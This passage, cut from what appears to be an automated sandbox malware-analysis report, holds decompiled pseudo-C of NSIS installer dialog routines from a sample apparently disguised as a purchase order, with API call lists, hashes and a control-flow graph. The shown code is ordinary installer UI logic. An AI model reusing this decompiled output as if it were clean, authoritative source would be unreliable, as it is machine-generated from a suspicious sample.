                                                                                      				signed int _t38;
                                                                                      				struct HWND__* _t48;
                                                                                      				signed int _t67;
                                                                                      				struct HWND__* _t73;
                                                                                      				signed int _t86;
                                                                                      				struct HWND__* _t91;
                                                                                      				signed int _t99;
                                                                                      				int _t103;
                                                                                      				signed int _t117;
                                                                                      				int _t118;
                                                                                      				int _t122;
                                                                                      				signed int _t124;
                                                                                      				struct HWND__* _t127;
                                                                                      				struct HWND__* _t128;
                                                                                      				int _t129;
                                                                                      				intOrPtr _t130;
                                                                                      				long _t133;
                                                                                      				int _t135;
                                                                                      				int _t136;
                                                                                      				void* _t137;
                                                                                      
                                                                                      				_t130 = _a8;
                                                                                      				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                      					_t34 = _a12;
                                                                                      					_t127 = _a4;
                                                                                      					__eflags = _t130 - 0x110;
                                                                                      					 *0x423730 = _t34;
                                                                                      					if(_t130 == 0x110) {
                                                                                      						 *0x42a268 = _t127;
                                                                                      						 *0x423744 = GetDlgItem(_t127, 1);
                                                                                      						_t91 = GetDlgItem(_t127, 2);
                                                                                      						_push(0xffffffff);
                                                                                      						_push(0x1c);
                                                                                      						 *0x421710 = _t91;
                                                                                      						E004045C4(_t127);
                                                                                      						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
                                                                                      						 *0x42922c = E0040140B(4);
                                                                                      						_t34 = 1;
                                                                                      						__eflags = 1;
                                                                                      						 *0x423730 = 1;
                                                                                      					}
                                                                                      					_t124 =  *0x40a39c; // 0x0
                                                                                      					_t136 = 0;
                                                                                      					_t133 = (_t124 << 6) +  *0x42a280;
                                                                                      					__eflags = _t124;
                                                                                      					if(_t124 < 0) {
                                                                                      						L36:
                                                                                      						E00404610(0x40b);
                                                                                      						while(1) {
                                                                                      							_t36 =  *0x423730;
                                                                                      							 *0x40a39c =  *0x40a39c + _t36;
                                                                                      							_t133 = _t133 + (_t36 << 6);
                                                                                      							_t38 =  *0x40a39c; // 0x0
                                                                                      							__eflags = _t38 -  *0x42a284;
                                                                                      							if(_t38 ==  *0x42a284) {
                                                                                      								E0040140B(1);
                                                                                      							}
                                                                                      							__eflags =  *0x42922c - _t136;
                                                                                      							if( *0x42922c != _t136) {
                                                                                      								break;
                                                                                      							}
                                                                                      							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                                      							if(__eflags >= 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t117 =  *(_t133 + 0x14);
                                                                                      							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                      							_push(0xfffffc19);
                                                                                      							E004045C4(_t127);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                      							_push(0xfffffc1b);
                                                                                      							E004045C4(_t127);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                      							_push(0xfffffc1a);
                                                                                      							E004045C4(_t127);
                                                                                      							_t48 = GetDlgItem(_t127, 3);
                                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                                      							_v28 = _t48;
                                                                                      							if( *0x42a2ec != _t136) {
                                                                                      								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                      								__eflags = _t117;
                                                                                      							}
                                                                                      							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                      							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                      							E004045E6(_t117 & 0x00000002);
                                                                                      							_t118 = _t117 & 0x00000004;
                                                                                      							EnableWindow( *0x421710, _t118);
                                                                                      							__eflags = _t118 - _t136;
                                                                                      							if(_t118 == _t136) {
                                                                                      								_push(1);
                                                                                      							} else {
                                                                                      								_push(_t136);
                                                                                      							}
                                                                                      							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                      							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                                      							if( *0x42a2ec == _t136) {
                                                                                      								_push( *0x423744);
                                                                                      							} else {
                                                                                      								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                      								_push( *0x421710);
                                                                                      							}
                                                                                      							E004045F9();
                                                                                      							E00406668(0x423748, E004040A6());
                                                                                      							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                      							SetWindowTextW(_t127, 0x423748); // executed
                                                                                      							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                                                      							__eflags = _t67;
                                                                                      							if(_t67 != 0) {
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								__eflags =  *_t133 - _t136;
                                                                                      								if( *_t133 == _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                                      								if( *(_t133 + 4) != 5) {
                                                                                      									DestroyWindow( *0x429238); // executed
                                                                                      									 *0x422720 = _t133;
                                                                                      									__eflags =  *_t133 - _t136;
                                                                                      									if( *_t133 <= _t136) {
                                                                                      										goto L60;
                                                                                      									}
                                                                                      									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                                      									__eflags = _t73 - _t136;
                                                                                      									 *0x429238 = _t73;
                                                                                      									if(_t73 == _t136) {
                                                                                      										goto L60;
                                                                                      									}
                                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                      									_push(6);
                                                                                      									E004045C4(_t73);
                                                                                      									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                      									ScreenToClient(_t127, _t137 + 0x10);
                                                                                      									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                                                      									__eflags =  *0x42922c - _t136;
                                                                                      									if( *0x42922c != _t136) {
                                                                                      										goto L63;
                                                                                      									}
                                                                                      									ShowWindow( *0x429238, 8); // executed
                                                                                      									E00404610(0x405);
                                                                                      									goto L60;
                                                                                      								}
                                                                                      								__eflags =  *0x42a2ec - _t136;
                                                                                      								if( *0x42a2ec != _t136) {
                                                                                      									goto L63;
                                                                                      								}
                                                                                      								__eflags =  *0x42a2e0 - _t136;
                                                                                      								if( *0x42a2e0 != _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L63;
                                                                                      							}
                                                                                      						}
                                                                                      						DestroyWindow( *0x429238);
                                                                                      						 *0x42a268 = _t136;
                                                                                      						EndDialog(_t127,  *0x421f18);
                                                                                      						goto L60;
                                                                                      					} else {
                                                                                      						__eflags = _t34 - 1;
                                                                                      						if(_t34 != 1) {
                                                                                      							L35:
                                                                                      							__eflags =  *_t133 - _t136;
                                                                                      							if( *_t133 == _t136) {
                                                                                      								goto L63;
                                                                                      							}
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                                                      						__eflags = _t86;
                                                                                      						if(_t86 == 0) {
                                                                                      							goto L35;
                                                                                      						}
                                                                                      						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                                      						__eflags =  *0x42922c;
                                                                                      						return 0 |  *0x42922c == 0x00000000;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t127 = _a4;
                                                                                      					_t136 = 0;
                                                                                      					if(_t130 == 0x47) {
                                                                                      						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                                                      					}
                                                                                      					_t122 = _a12;
                                                                                      					if(_t130 != 5) {
                                                                                      						L8:
                                                                                      						if(_t130 != 0x40d) {
                                                                                      							__eflags = _t130 - 0x11;
                                                                                      							if(_t130 != 0x11) {
                                                                                      								__eflags = _t130 - 0x111;
                                                                                      								if(_t130 != 0x111) {
                                                                                      									goto L28;
                                                                                      								}
                                                                                      								_t135 = _t122 & 0x0000ffff;
                                                                                      								_t128 = GetDlgItem(_t127, _t135);
                                                                                      								__eflags = _t128 - _t136;
                                                                                      								if(_t128 == _t136) {
                                                                                      									L15:
                                                                                      									__eflags = _t135 - 1;
                                                                                      									if(_t135 != 1) {
                                                                                      										__eflags = _t135 - 3;
                                                                                      										if(_t135 != 3) {
                                                                                      											_t129 = 2;
                                                                                      											__eflags = _t135 - _t129;
                                                                                      											if(_t135 != _t129) {
                                                                                      												L27:
                                                                                      												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                                                      												goto L28;
                                                                                      											}
                                                                                      											__eflags =  *0x42a2ec - _t136;
                                                                                      											if( *0x42a2ec == _t136) {
                                                                                      												_t99 = E0040140B(3);
                                                                                      												__eflags = _t99;
                                                                                      												if(_t99 != 0) {
                                                                                      													goto L28;
                                                                                      												}
                                                                                      												 *0x421f18 = 1;
                                                                                      												L23:
                                                                                      												_push(0x78);
                                                                                      												L24:
                                                                                      												E0040459D();
                                                                                      												goto L28;
                                                                                      											}
                                                                                      											E0040140B(_t129);
                                                                                      											 *0x421f18 = _t129;
                                                                                      											goto L23;
                                                                                      										}
                                                                                      										__eflags =  *0x40a39c - _t136; // 0x0
                                                                                      										if(__eflags <= 0) {
                                                                                      											goto L27;
                                                                                      										}
                                                                                      										_push(0xffffffff);
                                                                                      										goto L24;
                                                                                      									}
                                                                                      									_push(_t135);
                                                                                      									goto L24;
                                                                                      								}
                                                                                      								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                      								_t103 = IsWindowEnabled(_t128);
                                                                                      								__eflags = _t103;
                                                                                      								if(_t103 == 0) {
                                                                                      									L63:
                                                                                      									return 0;
                                                                                      								}
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							SetWindowLongW(_t127, _t136, _t136);
                                                                                      							return 1;
                                                                                      						}
                                                                                      						DestroyWindow( *0x429238);
                                                                                      						 *0x429238 = _t122;
                                                                                      						L60:
                                                                                      						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
                                                                                      							ShowWindow(_t127, 0xa); // executed
                                                                                      							 *0x425748 = 1;
                                                                                      						}
                                                                                      						goto L63;
                                                                                      					} else {
                                                                                      						asm("sbb eax, eax");
                                                                                      						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                                      						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                      							L28:
                                                                                      							return E0040462B(_a8, _t122, _a16);
                                                                                      						} else {
                                                                                      							ShowWindow(_t127, 4);
                                                                                      							goto L8;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}































                                                                                      0x004040d0
                                                                                      0x004040d7
                                                                                      0x0040423e
                                                                                      0x00404242
                                                                                      0x00404246
                                                                                      0x00404248
                                                                                      0x0040424d
                                                                                      0x00404258
                                                                                      0x00404263
                                                                                      0x00404268
                                                                                      0x0040426a
                                                                                      0x0040426c
                                                                                      0x0040426f
                                                                                      0x00404274
                                                                                      0x00404282
                                                                                      0x0040428f
                                                                                      0x00404296
                                                                                      0x00404296
                                                                                      0x00404297
                                                                                      0x00404297
                                                                                      0x0040429c
                                                                                      0x004042a2
                                                                                      0x004042a9
                                                                                      0x004042af
                                                                                      0x004042b1
                                                                                      0x004042f1
                                                                                      0x004042f6
                                                                                      0x004042fb
                                                                                      0x004042fb
                                                                                      0x00404300
                                                                                      0x00404309
                                                                                      0x0040430b
                                                                                      0x00404310
                                                                                      0x00404316
                                                                                      0x0040431a
                                                                                      0x0040431a
                                                                                      0x0040431f
                                                                                      0x00404325
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404330
                                                                                      0x00404336
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040433f
                                                                                      0x00404347
                                                                                      0x0040434c
                                                                                      0x0040434f
                                                                                      0x00404355
                                                                                      0x0040435a
                                                                                      0x0040435d
                                                                                      0x00404363
                                                                                      0x00404368
                                                                                      0x0040436b
                                                                                      0x00404371
                                                                                      0x00404379
                                                                                      0x0040437f
                                                                                      0x00404385
                                                                                      0x00404389
                                                                                      0x00404390
                                                                                      0x00404390
                                                                                      0x00404390
                                                                                      0x0040439a
                                                                                      0x004043ac
                                                                                      0x004043b8
                                                                                      0x004043bd
                                                                                      0x004043c7
                                                                                      0x004043cd
                                                                                      0x004043cf
                                                                                      0x004043d4
                                                                                      0x004043d1
                                                                                      0x004043d1
                                                                                      0x004043d1
                                                                                      0x004043e4
                                                                                      0x004043fc
                                                                                      0x004043fe
                                                                                      0x00404404
                                                                                      0x00404419
                                                                                      0x00404406
                                                                                      0x0040440f
                                                                                      0x00404411
                                                                                      0x00404411
                                                                                      0x0040441f
                                                                                      0x00404430
                                                                                      0x00404446
                                                                                      0x0040444d
                                                                                      0x00404457
                                                                                      0x0040445c
                                                                                      0x0040445e
                                                                                      0x00000000
                                                                                      0x00404464
                                                                                      0x00404464
                                                                                      0x00404466
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040446c
                                                                                      0x00404470
                                                                                      0x00404495
                                                                                      0x0040449b
                                                                                      0x004044a1
                                                                                      0x004044a3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004044c9
                                                                                      0x004044cf
                                                                                      0x004044d1
                                                                                      0x004044d6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004044dc
                                                                                      0x004044df
                                                                                      0x004044e2
                                                                                      0x004044f9
                                                                                      0x00404505
                                                                                      0x0040451e
                                                                                      0x00404528
                                                                                      0x0040452d
                                                                                      0x00404533
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040453d
                                                                                      0x00404548
                                                                                      0x00000000
                                                                                      0x00404548
                                                                                      0x00404472
                                                                                      0x00404478
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040447e
                                                                                      0x00404484
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040448a
                                                                                      0x0040445e
                                                                                      0x00404555
                                                                                      0x00404561
                                                                                      0x00404568
                                                                                      0x00000000
                                                                                      0x004042b3
                                                                                      0x004042b3
                                                                                      0x004042b6
                                                                                      0x004042e9
                                                                                      0x004042e9
                                                                                      0x004042eb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004042eb
                                                                                      0x004042bc
                                                                                      0x004042c1
                                                                                      0x004042c3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004042d3
                                                                                      0x004042db
                                                                                      0x00000000
                                                                                      0x004042e1
                                                                                      0x004040e9
                                                                                      0x004040e9
                                                                                      0x004040ed
                                                                                      0x004040f2
                                                                                      0x00404101
                                                                                      0x00404101
                                                                                      0x00404107
                                                                                      0x0040410e
                                                                                      0x00404152
                                                                                      0x00404158
                                                                                      0x00404171
                                                                                      0x00404174
                                                                                      0x00404187
                                                                                      0x0040418d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404193
                                                                                      0x0040419e
                                                                                      0x004041a0
                                                                                      0x004041a2
                                                                                      0x004041c1
                                                                                      0x004041c1
                                                                                      0x004041c4
                                                                                      0x004041c9
                                                                                      0x004041cc
                                                                                      0x004041dc
                                                                                      0x004041dd
                                                                                      0x004041df
                                                                                      0x00404215
                                                                                      0x00404225
                                                                                      0x00000000
                                                                                      0x00404225
                                                                                      0x004041e1
                                                                                      0x004041e7
                                                                                      0x00404200
                                                                                      0x00404205
                                                                                      0x00404207
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404209
                                                                                      0x004041f5
                                                                                      0x004041f5
                                                                                      0x004041f7
                                                                                      0x004041f7
                                                                                      0x00000000
                                                                                      0x004041f7
                                                                                      0x004041ea
                                                                                      0x004041ef
                                                                                      0x00000000
                                                                                      0x004041ef
                                                                                      0x004041ce
                                                                                      0x004041d4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041d6
                                                                                      0x00000000
                                                                                      0x004041d6
                                                                                      0x004041c6
                                                                                      0x00000000
                                                                                      0x004041c6
                                                                                      0x004041ac
                                                                                      0x004041b3
                                                                                      0x004041b9
                                                                                      0x004041bb
                                                                                      0x00404591
                                                                                      0x00000000
                                                                                      0x00404591
                                                                                      0x00000000
                                                                                      0x004041bb
                                                                                      0x00404179
                                                                                      0x00000000
                                                                                      0x00404181
                                                                                      0x00404160
                                                                                      0x00404166
                                                                                      0x0040456e
                                                                                      0x00404574
                                                                                      0x00404581
                                                                                      0x00404587
                                                                                      0x00404587
                                                                                      0x00000000
                                                                                      0x00404110
                                                                                      0x00404115
                                                                                      0x00404121
                                                                                      0x0040412a
                                                                                      0x0040422b
                                                                                      0x00000000
                                                                                      0x00404149
                                                                                      0x0040414c
                                                                                      0x00000000
                                                                                      0x0040414c
                                                                                      0x0040412a
                                                                                      0x0040410e

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                      • ShowWindow.USER32(?), ref: 00404121
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                      • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                      • DestroyWindow.USER32 ref: 00404160
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                      • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                      • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                      • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                      • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                      • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: H7B
                                                                                      • API String ID: 121052019-2300413410
                                                                                      • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                      • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                      • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                      • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 314 403d9d-403dc6 call 403fed call 40603f 304->314 310 403d92-403d98 lstrcatW 305->310 311 403d7c-403d8d call 406536 305->311 310->314 311->310 319 403e58-403e60 call 40603f 314->319 320 403dcc-403dd1 314->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 322 403dd7-403df1 call 406536 320->322 325 403df6-403dff 322->325 325->319 328 403e01-403e05 325->328 326->327 330 403f14-403f1c call 40140b 327->330 331 403e95-403ec5 RegisterClassW 327->331 332 403e17-403e23 lstrlenW 328->332 333 403e07-403e14 call 405f64 328->333 344 403f26-403f31 call 403fed 330->344 345 403f1e-403f21 330->345 334 403fe3 331->334 335 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->335 339 403e25-403e33 lstrcmpiW 332->339 340 403e4b-403e53 call 405f37 call 406668 332->340 333->332 338 403fe5-403fec 334->338 335->330 339->340 343 403e35-403e3f GetFileAttributesW 339->343 340->319 347 403e41-403e43 343->347 348 403e45-403e46 call 405f83 343->348 354 403f37-403f51 ShowWindow call 4069c5 344->354 355 403fba-403fbb call 40579d 344->355 345->338 347->340 347->348 348->340 360 403f53-403f58 call 4069c5 354->360 361 403f5d-403f6f GetClassInfoW 354->361 359 403fc0-403fc2 355->359 362 403fc4-403fca 359->362 363 403fdc-403fde call 40140b 359->363 360->361 366 403f71-403f81 GetClassInfoW RegisterClassW 361->366 367 403f87-403faa DialogBoxParamW call 40140b 361->367 362->345 368 403fd0-403fd7 call 40140b 362->368 363->334 366->367 372 403faf-403fb8 call 403c67 367->372 368->345 372->338
                                                                                      C-Code - Quality: 96%
                                                                                      			E00403D17(void* __eflags) {
                                                                                      				intOrPtr _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void _v16;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t22;
                                                                                      				void* _t30;
                                                                                      				void* _t32;
                                                                                      				int _t33;
                                                                                      				void* _t36;
                                                                                      				int _t39;
                                                                                      				int _t40;
                                                                                      				int _t44;
                                                                                      				short _t63;
                                                                                      				WCHAR* _t65;
                                                                                      				signed char _t69;
                                                                                      				WCHAR* _t76;
                                                                                      				intOrPtr _t82;
                                                                                      				WCHAR* _t87;
                                                                                      
                                                                                      				_t82 =  *0x42a270;
                                                                                      				_t22 = E00406A35(2);
                                                                                      				_t90 = _t22;
                                                                                      				if(_t22 == 0) {
                                                                                      					_t76 = 0x423748;
                                                                                      					L"1033" = 0x30;
                                                                                      					 *0x437002 = 0x78;
                                                                                      					 *0x437004 = 0;
                                                                                      					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                                      					__eflags =  *0x423748;
                                                                                      					if(__eflags == 0) {
                                                                                      						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                                      					}
                                                                                      					lstrcatW(L"1033", _t76);
                                                                                      				} else {
                                                                                      					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                                      				}
                                                                                      				E00403FED(_t78, _t90);
                                                                                      				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
                                                                                      				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                                      				 *0x42a2fc = 0x10000;
                                                                                      				if(E0040603F(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
                                                                                      					L16:
                                                                                      					if(E0040603F(_t98, _t86) == 0) {
                                                                                      						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                                      					}
                                                                                      					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                      					 *0x429248 = _t30;
                                                                                      					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                      						L21:
                                                                                      						if(E0040140B(0) == 0) {
                                                                                      							_t32 = E00403FED(_t78, __eflags);
                                                                                      							__eflags =  *0x42a300;
                                                                                      							if( *0x42a300 != 0) {
                                                                                      								_t33 = E0040579D(_t32, 0);
                                                                                      								__eflags = _t33;
                                                                                      								if(_t33 == 0) {
                                                                                      									E0040140B(1);
                                                                                      									goto L33;
                                                                                      								}
                                                                                      								__eflags =  *0x42922c;
                                                                                      								if( *0x42922c == 0) {
                                                                                      									E0040140B(2);
                                                                                      								}
                                                                                      								goto L22;
                                                                                      							}
                                                                                      							ShowWindow( *0x423728, 5); // executed
                                                                                      							_t39 = E004069C5("RichEd20"); // executed
                                                                                      							__eflags = _t39;
                                                                                      							if(_t39 == 0) {
                                                                                      								E004069C5("RichEd32");
                                                                                      							}
                                                                                      							_t87 = L"RichEdit20W";
                                                                                      							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                                      							__eflags = _t40;
                                                                                      							if(_t40 == 0) {
                                                                                      								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                                      								 *0x429224 = _t87;
                                                                                      								RegisterClassW(0x429200);
                                                                                      							}
                                                                                      							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                                      							E00403C67(E0040140B(5), 1);
                                                                                      							return _t44;
                                                                                      						}
                                                                                      						L22:
                                                                                      						_t36 = 2;
                                                                                      						return _t36;
                                                                                      					} else {
                                                                                      						_t78 =  *0x42a260;
                                                                                      						 *0x429204 = E00401000;
                                                                                      						 *0x429210 =  *0x42a260;
                                                                                      						 *0x429214 = _t30;
                                                                                      						 *0x429224 = 0x40a3b4;
                                                                                      						if(RegisterClassW(0x429200) == 0) {
                                                                                      							L33:
                                                                                      							__eflags = 0;
                                                                                      							return 0;
                                                                                      						}
                                                                                      						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                      						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                                      						goto L21;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t78 =  *(_t82 + 0x48);
                                                                                      					_t92 = _t78;
                                                                                      					if(_t78 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					_t76 = 0x428200;
                                                                                      					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                                      					_t63 =  *0x428200; // 0x43
                                                                                      					if(_t63 == 0) {
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					if(_t63 == 0x22) {
                                                                                      						_t76 = 0x428202;
                                                                                      						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                                      					}
                                                                                      					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                      					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                      						L15:
                                                                                      						E00406668(_t86, E00405F37(_t76));
                                                                                      						goto L16;
                                                                                      					} else {
                                                                                      						_t69 = GetFileAttributesW(_t76);
                                                                                      						if(_t69 == 0xffffffff) {
                                                                                      							L14:
                                                                                      							E00405F83(_t76);
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						_t98 = _t69 & 0x00000010;
                                                                                      						if((_t69 & 0x00000010) != 0) {
                                                                                      							goto L15;
                                                                                      						}
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      			}
























                                                                                      0x00403d1d
                                                                                      0x00403d26
                                                                                      0x00403d2d
                                                                                      0x00403d2f
                                                                                      0x00403d43
                                                                                      0x00403d55
                                                                                      0x00403d5e
                                                                                      0x00403d67
                                                                                      0x00403d6e
                                                                                      0x00403d73
                                                                                      0x00403d7a
                                                                                      0x00403d8d
                                                                                      0x00403d8d
                                                                                      0x00403d98
                                                                                      0x00403d31
                                                                                      0x00403d3c
                                                                                      0x00403d3c
                                                                                      0x00403d9d
                                                                                      0x00403da7
                                                                                      0x00403db0
                                                                                      0x00403db5
                                                                                      0x00403dc6
                                                                                      0x00403e58
                                                                                      0x00403e60
                                                                                      0x00403e69
                                                                                      0x00403e69
                                                                                      0x00403e7f
                                                                                      0x00403e85
                                                                                      0x00403e93
                                                                                      0x00403f14
                                                                                      0x00403f1c
                                                                                      0x00403f26
                                                                                      0x00403f2b
                                                                                      0x00403f31
                                                                                      0x00403fbb
                                                                                      0x00403fc0
                                                                                      0x00403fc2
                                                                                      0x00403fde
                                                                                      0x00000000
                                                                                      0x00403fde
                                                                                      0x00403fc4
                                                                                      0x00403fca
                                                                                      0x00403fd2
                                                                                      0x00403fd2
                                                                                      0x00000000
                                                                                      0x00403fca
                                                                                      0x00403f3f
                                                                                      0x00403f4a
                                                                                      0x00403f4f
                                                                                      0x00403f51
                                                                                      0x00403f58
                                                                                      0x00403f58
                                                                                      0x00403f63
                                                                                      0x00403f6b
                                                                                      0x00403f6d
                                                                                      0x00403f6f
